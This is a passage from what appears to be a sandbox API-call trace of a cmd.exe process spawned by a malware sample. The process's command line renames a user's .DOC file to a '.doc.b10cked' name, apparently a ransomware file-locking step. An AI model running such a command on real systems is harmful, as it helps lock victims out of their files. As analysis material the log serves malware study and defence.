returned 1 [0140.754] SetConsoleInputExeNameW () returned 0x1 [0140.754] GetConsoleOutputCP () returned 0x1b5 [0140.755] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.755] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.755] exit (_Code=0) Process: id = "151" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xd84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14546 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14547 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14548 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14549 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14550 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" 
(normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14551 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14552 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14553 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14554 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14555 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15786 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15787 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15788 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15789 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 15790 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 15791 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 15792 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15793 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15794 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15795 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15796 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15797 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15798 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15799 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15800 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 15801 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15802 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15803 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15804 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15805 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 15806 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 15807 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 15808 start_va = 0x10e0000 end_va = 0x1242fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 15809 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Thread: id = 208 os_tid = 0xd80 [0140.667] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fccc | out: lpSystemTimeAsFileTime=0x16fccc*(dwLowDateTime=0x8dc704a0, dwHighDateTime=0x1d440a9)) [0140.667] GetCurrentProcessId () returned 0xd84 [0140.667] GetCurrentThreadId () returned 0xd80 [0140.667] GetTickCount () returned 0x2c264 [0140.667] QueryPerformanceCounter (in: lpPerformanceCount=0x16fcc4 | out: lpPerformanceCount=0x16fcc4*=19745654467) returned 1 [0140.668] GetModuleHandleA (lpModuleName=0x0) returned 
0x4a9c0000 [0140.668] __set_app_type (_Type=0x1) [0140.668] __p__fmode () returned 0x76b331f4 [0140.668] __p__commode () returned 0x76b331fc [0140.668] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.668] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.669] GetCurrentThreadId () returned 0xd80 [0140.669] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd80) returned 0x38 [0140.669] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.669] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.669] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.669] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.669] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fc5c | out: phkResult=0x16fc5c*=0x0) returned 0x2 [0140.669] VirtualQuery (in: lpAddress=0x16fc93, lpBuffer=0x16fc2c, dwLength=0x1c | out: lpBuffer=0x16fc2c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.669] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fc2c, dwLength=0x1c | out: lpBuffer=0x16fc2c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.669] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fc2c, dwLength=0x1c | out: lpBuffer=0x16fc2c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.669] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fc2c, dwLength=0x1c | out: 
lpBuffer=0x16fc2c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.669] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fc2c, dwLength=0x1c | out: lpBuffer=0x16fc2c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.669] GetConsoleOutputCP () returned 0x1b5 [0140.670] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.670] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.670] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.670] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.670] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.670] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.670] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.671] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.671] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.671] GetEnvironmentStringsW () returned 0x2e01d8* [0140.671] FreeEnvironmentStringsW (penv=0x2e01d8) returned 1 [0140.671] GetEnvironmentStringsW () returned 0x2e01d8* [0140.671] FreeEnvironmentStringsW (penv=0x2e01d8) returned 1 [0140.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ebcc | out: phkResult=0x16ebcc*=0x40) returned 0x0 [0140.671] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x0, 
lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.671] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x1, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.671] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x1, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.671] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x0, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x40, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x40, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x40, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.672] RegCloseKey (hKey=0x40) returned 0x0 [0140.672] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ebcc | out: phkResult=0x16ebcc*=0x40) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x40, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.672] RegQueryValueExW (in: 
hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x1, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x1, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x0, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x9, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x4, lpData=0x16ebd8*=0x9, lpcbData=0x16ebd0*=0x4) returned 0x0 [0140.672] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ebd4, lpData=0x16ebd8, lpcbData=0x16ebd0*=0x1000 | out: lpType=0x16ebd4*=0x0, lpData=0x16ebd8*=0x9, lpcbData=0x16ebd0*=0x1000) returned 0x2 [0140.672] RegCloseKey (hKey=0x40) returned 0x0 [0140.672] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.672] srand (_Seed=0x5b88636f) [0140.672] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"" [0140.672] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\BDJO8C~1.DOC\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\bDJO8cWgfh9q_unjpPU-.doc.b10cked\"" [0140.672] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.673] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.673] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.673] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.673] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.673] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.673] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.673] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.673] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.673] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.673] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.673] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.673] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.673] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.673] GetEnvironmentStringsW () returned 0x2e2328* [0140.674] FreeEnvironmentStringsW (penv=0x2e2328) returned 1 [0140.674] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.674] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="") returned 0x0 [0140.674] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.674] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.674] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.674] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.674] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.674] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.674] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.674] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.674] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f998 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.674] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f998, lpFilePart=0x16f994 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f994*="Desktop") returned 0x18 [0140.674] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.674] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f714 | out: lpFindFileData=0x16f714) returned 0x2e0068 [0140.674] FindClose (in: hFindFile=0x2e0068 | out: hFindFile=0x2e0068) returned 1 [0140.675] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f714 | out: lpFindFileData=0x16f714) returned 0x2e0068 [0140.675] FindClose (in: hFindFile=0x2e0068 | out: hFindFile=0x2e0068) returned 1 [0140.675] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f714 | out: lpFindFileData=0x16f714) returned 0x2e0068 [0140.675] FindClose (in: hFindFile=0x2e0068 | out: hFindFile=0x2e0068) returned 1 [0140.675] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.675] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 1 [0140.675] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.675] GetEnvironmentStringsW () returned 0x2e2b48* [0140.675] FreeEnvironmentStringsW (penv=0x2e2b48) returned 1 [0140.675] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.676] GetConsoleOutputCP () returned 0x1b5 [0140.676] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.676] GetUserDefaultLCID () returned 0x409 [0140.676] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fad8, cchData=128 | out: lpLCData="0") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fad8, cchData=128 | out: lpLCData="0") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fad8, cchData=128 | out: lpLCData="1") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.677] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.677] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.678] GetConsoleTitleW (in: lpConsoleTitle=0x2d0918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.678] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.678] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.678] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.678] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.679] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.679] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.679] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.679] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.679] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.679] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.679] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.683] GetConsoleTitleW (in: lpConsoleTitle=0x16f7d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.043] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.043] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.043] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.043] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.043] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.043] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.043] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.043] 
_wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.043] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.043] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.043] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.043] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.043] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.043] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.043] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.043] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.043] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.043] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.043] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.043] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.043] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.043] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.043] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.043] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.043] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.043] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.043] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.043] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.043] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.043] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.043] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.043] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.043] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.043] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.043] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.045] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.045] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 
